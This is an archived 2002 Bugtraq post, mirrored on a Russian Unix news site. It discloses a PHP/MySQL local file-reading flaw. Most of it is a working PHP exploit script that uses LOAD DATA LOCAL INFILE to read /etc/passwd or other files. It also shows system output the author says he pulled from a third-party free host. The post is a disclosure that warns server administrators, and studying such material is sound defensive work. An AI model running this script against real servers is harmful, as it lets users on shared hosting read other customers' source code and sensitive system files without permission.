The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version
Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке.
SOFT - Unix Software catalog
LINKS - Unix resources		 TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

File reading vulnerable in PHP and MySQL (Local Exploit)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: 26 Nov 2002 10:57:52 -0000
From: Hai Nam Luke <hainamluke@hotmail.com>
To: bugtraq@securityfocus.com
Subject: File reading vulnerable in PHP and MySQL (Local Exploit)



Attacker can use PHP and mySQL to read some local file following this way:

# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)



<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view 

// shell code
        echo "<pre>";

                                mysql_connect ($dbhost, $dbuser, 
$dbpasswd);
                                $sql = array (
                                   "USE $dbname",

                                   'CREATE TEMPORARY TABLE ' . ($tbl 
= 'A'.time
()) . ' (a LONGBLOB)',

                                   "LOAD DATA LOCAL INFILE '$file' INTO 
TABLE
$tbl FIELDS "
                                   . "TERMINATED BY      
'__THIS_NEVER_HAPPENS__' "
                                   . "ESCAPED BY          '' "
                                   . "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",

                                   "SELECT a FROM $tbl LIMIT 1"
                                );


                                foreach ($sql as $statement) {
                                   $query = mysql_query ($statement);

                                   if ($query == false) die (
                                      "FAILED: " . $statement . "\n" .
                                      "REASON: " . mysql_error () . "\n"
                                   );

                                   if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;

                                   echo htmlspecialchars($r[0]);
                                   mysql_free_result ($query);
                                }
    echo "</pre>";
?>




You'll recived all source of /etc/passwd

This vulnerable is very dangerous because user can read some important 
file in your server. Especially, at any free host, user can use local 
exploit to read source code of other user and attack one another.

Example: I uploaded this file and config it at http://members.lycos.co.uk/ 
and I
was recived their file: "/proc/cpuinfo" :



processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 8
model name	: Pentium III (Coppermine)
stepping	: 10
cpu MHz		: 997.531
cache size	: 256 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 2
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca 
cmov pat pse36
mmx fxsr sse
bogomips	: 1992.29

processor	: 1
vendor_id	: GenuineIntel
cpu family	: 6
model		: 8
model name	: Pentium III (Coppermine)
stepping	: 10
cpu MHz		: 997.531
cache size	: 256 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 2
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca 
cmov pat pse36
mmx fxsr sse
bogomips	: 1992.29



And many another files, please check your server !
Thank to dodo. Sorry for my poor English !

Luke (HVA)
http://www.hackervn.net

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки 		Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
InterReklama Advertizing
Интерреклама. Интернет